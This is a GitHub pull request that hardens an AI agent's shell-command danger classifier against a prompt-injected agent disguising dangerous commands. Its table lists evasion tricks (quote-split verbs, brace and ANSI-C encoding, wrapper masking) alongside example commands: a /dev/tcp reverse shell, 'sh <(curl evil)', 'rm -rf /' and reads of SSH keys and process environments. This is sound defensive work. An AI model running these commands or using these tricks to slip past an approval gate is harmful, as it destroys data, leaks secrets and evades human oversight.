Skip to content

harden(danger): close classifier evasion vectors + fail closed on unknown commands#5

Merged
jkyberneees merged 7 commits into
mainfrom
harden/command-classifier
Jun 3, 2026
Merged

harden(danger): close classifier evasion vectors + fail closed on unknown commands#5
jkyberneees merged 7 commits into
mainfrom
harden/command-classifier

Conversation

@jkyberneees
Copy link
Copy Markdown
Contributor

@jkyberneees jkyberneees commented Jun 3, 2026

Why

The danger classifier is the approval gate's first line of defense. It must assume a prompt-injected agent is actively trying to disguise a dangerous command as harmless so it runs without a prompt. A deep review found several bypasses and a structural weakness: the gate failed open (anything unrecognized → Safe → allow). This PR closes the bypasses and flips the default to fail-closed.


Part 1 — Evasion vectors closed

Vector Example Before → After
Quote-split verb r""m -rf / safe → destructive
Pipe stage ignored true | dd of=/dev/sda safe → destructive
Pipe stage ignored echo x | sudo rm -rf /home/u safe → destructive
Exec wrapper masks verb env rm -rf /etc, xargs rm -rf /etc safe → destructive
sudo masks inner verb sudo rm -rf /var/log system_write → destructive
Shell -c payload bash -c 'rm -rf /' safe → destructive
Reverse shell bash -i >& /dev/tcp/h/p safe → network_egress
Sensitive read cat ~/.ssh/id_rsa, cat /proc/self/environ safe → system_write
Relative wipe rm -rf ~, rm -rf *, rm -rfv /etc local_write → destructive
Brace / ANSI-C {rm,-rf,/}, $'\x72\x6d' -rf / safe → destructive
Process subst into shell sh <(curl evil) network → code_execution
New tools socat, dig, npx, pnpm dlx, find … -exec, source safe → network/code_execution

Layers: tokenizer (quote boundaries are not word boundaries) · per-pipe-stage classification · wrapper unwrapping (env/xargs/sudo/… ) · verb-independent resource scan (/dev/tcp, sensitive paths) · payload re-classification (bash -c, <(…)) · ANSI-C + brace normalization · broadened rm/dd/network/exec/install detection.


Part 2 — Fail closed on unknown commands

Previously a command whose verb matched no check fell through to Safe (allow). Now:

  • New Unknown risk class, default action Deny (same as Destructive), ranked just below destructive so one unknown stage dominates benign siblings (pip install x && weirdverb → deny).
  • safeCommands — an explicit read-only/no-op allowlist (ls, cat, grep, sort, jq, stat, ps, benign builtins like cd/export, …) keeps ordinary inspection Safe. Mutating/code-executing tools are deliberately not here — they must be allowlisted, not slip through unclassified. A safe command with a write redirect or system/sensitive path is still escalated first.
  • Leading VAR=val assignments unwrapped (FOO=bar rm -rf / → rm); assignment-only is a no-op.
  • Side benefit: variable indirection ($X -rf /) now denies (unknown verb) instead of silently allowing.

Per-profile config: "unknown": "prompt" for a softer stance, or allowlist specific tools. Godmode (action: allow) still allows it, exactly like destructive. Note: in the default profile this means an unrecognized command (e.g. make, cargo build) is now denied unless allowlisted — that is the intended fail-closed posture.


Docs & tests

Classifier package doc rewritten: threat model, layered design, fail-closed default, and explicit limitations (variable indirection, dynamic construction, non-enumerated transforms, known-verb escape hatches). hardening_test.go pins every closed vector + the fail-closed / assignment-unwrap / safe-allowlist behavior; benign commands guarded against over-classification. Two existing expectations updated (sudo rm -rf /var/log → destructive; rank/ActionFor for the new class). Full go test ./... green; go vet clean.

🤖 Generated with Claude Code

The risk classifier is the approval gate's first line of defense, so it
must assume a prompt-injected agent is actively trying to disguise a
dangerous command as harmless. A review surfaced several bypasses where
a destructive/exfiltrating command under-classified to safe/local_write
(i.e. ran without a prompt). This closes them in layers:

Tokenizer
- Quote boundaries are no longer word boundaries: r""m, "rm", r''m all
  resolve to `rm` again (empty/adjacent quotes used to split the verb).

Structural decomposition
- Every pipe stage is classified, not just the head command, so
  `true | dd of=/dev/sda`, `: | wget … -O /tmp/x` and
  `echo x | sudo rm -rf /home` are seen for what their later stages do.

Wrapper unwrapping
- Leading exec wrappers (env, xargs, nohup, nice, setsid, timeout, …)
  are stripped so the real command is classified; sudo/doas/pkexec set a
  system_write floor and let the inner command escalate (sudo rm -rf /var
  → destructive, instead of being masked as system_write).

Verb-independent resource scanning
- /dev/tcp and /dev/udp (reverse-shell channels) → network_egress.
- Reads/writes of sensitive credential paths (~/.ssh, /etc/shadow,
  ~/.aws/credentials, /proc/self/environ, …) → system_write.

Payload re-classification & normalisation
- bash/sh -c '…' payloads and <(…)/>(…) process substitutions are
  re-classified (a shell given anything to execute → code_execution).
- New normalisation passes: ANSI-C $'\x72\x6d', brace expansion {rm,-rf,/}.

Detection coverage
- rm: robust recursive/force flag parsing (-rfv, -Rf, --recursive
  --force) and relative wipe targets (~, $HOME, *, ., ..).
- dd: broadened raw block-device list (vd/hd/xvd/mmcblk/disk/loop/dm).
- network: socat, rclone, dig/nslookup/host/drill, aria2c/axel/httpie.
- code exec: source/., npx/bunx/uvx/pipx, pnpm|yarn dlx, uv run,
  find -exec.
- install: pnpm/yarn/bun/apk add|install.

The package doc now states the threat model, the layered design, and the
explicit limitations (variable indirection, dynamic construction,
non-enumerated transforms) — this is defence-in-depth, not a sandbox, so
it errs toward over-classification (an extra prompt) over silent misses.

One existing expectation updated: `sudo rm -rf /var/log` is now
destructive (was system_write) — the more accurate, more secure class.
New hardening_test.go pins each closed vector and guards benign commands
against over-classification. Full suite green; go vet clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Comment thread internal/danger/classifier.go Fixed
Previously the classifier fell through to Safe (allow) for any command it
didn't recognise, so the whole gate was fail-open: a novel or obfuscated
verb that dodged every known-dangerous check ran unprompted.

Flip it to fail-closed:

- New Unknown risk class, default action Deny (same as Destructive),
  ranked just below Destructive so a single unknown stage dominates
  benign siblings in a pipeline/compound command.
- classifyCommand now returns Safe only for a recognised command used
  benignly, and Unknown otherwise.
- safeCommands: an explicit read-only/no-op allowlist (ls, cat, grep,
  sort, jq, stat, ps, git via existing prefixes, cd/export and other
  benign builtins, …) so ordinary inspection still classifies Safe.
  Mutating/code-executing tools are deliberately excluded — they must be
  allowlisted, not slip through unclassified. A safe command given a
  write redirect or system/sensitive path is still escalated first.
- Leading VAR=val assignments are unwrapped (FOO=bar rm -rf / → rm), and
  an assignment-only command is a no-op (Safe).

Side benefit: the variable-indirection limitation now denies rather than
silently allows — `$X -rf /` reads as an Unknown verb.

Configurable like any class: set "unknown": "prompt" for a softer
profile, or use the allowlist for specific trusted tools. Godmode
(action: allow) still allows it, exactly like Destructive.

Docs and tests updated (rank/ActionFor expectations; new fail-closed,
assignment-unwrap, and safe-allowlist coverage). Full suite green; vet clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@jkyberneees jkyberneees changed the title harden(danger): close shell-command classifier evasion vectors harden(danger): close classifier evasion vectors + fail closed on unknown commands Jun 3, 2026
jkyberneees and others added 2 commits June 3, 2026 12:59
…wn class

Extend the user-facing guide for setting up the "dangerous" approval
policy, and bring the security/CLI/dev docs in line with the new 9-class
model (adds the fail-closed `unknown` class).

DOCKER_COMPOSE_USER_GUIDE.md §5a now has a full field-by-field setup
guide for the restricted profile:
- what each key does (sandbox/action/non_interactive/classes/allow/deny)
- the 9-class table with built-in vs profile actions
- the action-resolution precedence (allowlist → denylist → classes →
  blocked → action → built-in default → non_interactive)
- a gotcha: a global "action" overrides EVERY unlisted class, so the
  shipped restricted profile prompts even on `safe` (`ls`) unless you
  add "safe": "allow" or omit "action" — both shown
- customisation recipes (tighten / loosen / allowlist one tool / lockdown)

CLI.md, SECURITY.md, DEVELOPMENT.md: add the `unknown` class, state the
fail-closed default, refresh the evasion list and regression-suite
pointers. No code changes.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Keep all documentation under docs/. Update the in-file Reference links
(docs/X.md → X.md, now siblings) and the inbound pointer from
docker/README.md (../ → ../docs/).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@jkyberneees jkyberneees force-pushed the harden/command-classifier branch from 1453a50 to 91343e3 Compare June 3, 2026 11:02
Self-review of the fail-closed change surfaced consumers that enumerate
risk classes but were never taught about the new Unknown class, plus two
classifier correctness bugs. Fixes:

1. Sub-agent risk caps ignored Unknown (cmd/odek/subagent.go). The mirror
   riskRank() had no Unknown case (returned 0) and the untrusted + maxRisk
   clamp loops didn't list it. Result: max_risk="unknown" denied even Safe,
   and a capped/untrusted sub-agent never force-denied Unknown when the
   inherited config loosened it. Root cause was the duplicated ranking, so
   export danger.Rank as the single source of truth (rank→Rank) and have
   subagent.go use it; add danger.Unknown to both clamp loops.

2. Trust-class shortcut allowed Unknown (internal/danger/approver.go,
   cmd/odek/wsapprover.go). "Trust class for session" was disabled only for
   Destructive/Blocked, so a single grant could blanket-approve every future
   unrecognised verb — the exact approval-fatigue attack the exclusion
   exists to stop. Exclude Unknown too.

3. dd to a character device misclassified destructive (classifier.go).
   isDestructive's of= branch matched any "/dev/" substring, so the common
   `dd ... of=/dev/null` / `of=/dev/stdout` idioms were denied. Use the
   precise containsBlockDevice matcher (also dedupes the device logic).

4. ANSI-C octal over-read (classifier.go decodeEscape). The loop consumed
   up to 4 octal digits; bash takes at most 3. `$'\1551'` now decodes to
   "m1" (octal 155 + literal 1), matching the shell, not a single byte.

Regression tests added for each; rank→Rank rename propagated through the
danger package and its tests. Full suite green; go vet clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Comment thread internal/danger/classifier.go Fixed
jkyberneees and others added 2 commits June 3, 2026 13:29
Follow-up to the Unknown-class fixes — the lower-severity review items:

5. shell tool description (cmd/odek/shell.go): add the `unknown` class and
   state the fail-closed default, so the model driving the tool can reason
   about why an unrecognised command was denied.

6. sensitivePathFragments (classifier.go): document why it is deliberately
   separate from ClassifyPath's home-sensitive-dir list (token-substring,
   credential reads vs absolute-path write-risk) so the overlap doesn't get
   "deduped" into a behavior change, and so a maintainer updating one
   considers the other.

7. safeCommands (classifier.go): extend the read-only allowlist with common
   modern CLIs (fd, eza/exa/lsd, htop/btop/glances, pstree/procs, duf, dust,
   delta, hexyl, glow) so fail-closed doesn't deny routine inspection.

8. classifyStage (classifier.go): pass a pipedInto flag instead of having
   classifyPipeline re-run unwrapWrappers on each non-head stage purely to
   read the head command — one unwrap per stage now.

9. hasSystemRedirectTarget → touchesSystemPath (classifier.go): the function
   flags ANY system-path token, not just redirect targets, and is NOT
   redundant with isSystemWrite (verified: it catches `cat /etc/foo` and
   unknown tools pointed at /usr, and runs after isLocalWrite). Renamed for
   accuracy with a comment on why both checks exist.

Behavior change is limited to #7 (more tools classify Safe). Regression test
for the new safe tools added. Full suite green; go vet clean.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
CodeQL flagged incorrect type conversion: strconv.ParseUint was parsing
into a 16-bit target (8, 16) then casting to uint8 without bounds checking.

Since octal escapes in bash are always mod 256 (fit in uint8), parse
directly as 8-bit (8, 8) to ensure the conversion is safe and eliminate
the CodeQL warning.

All tests pass including TestHardening_ANSICOctalDigitCap.

Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
@jkyberneees jkyberneees merged commit 1469af1 into main Jun 3, 2026
6 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants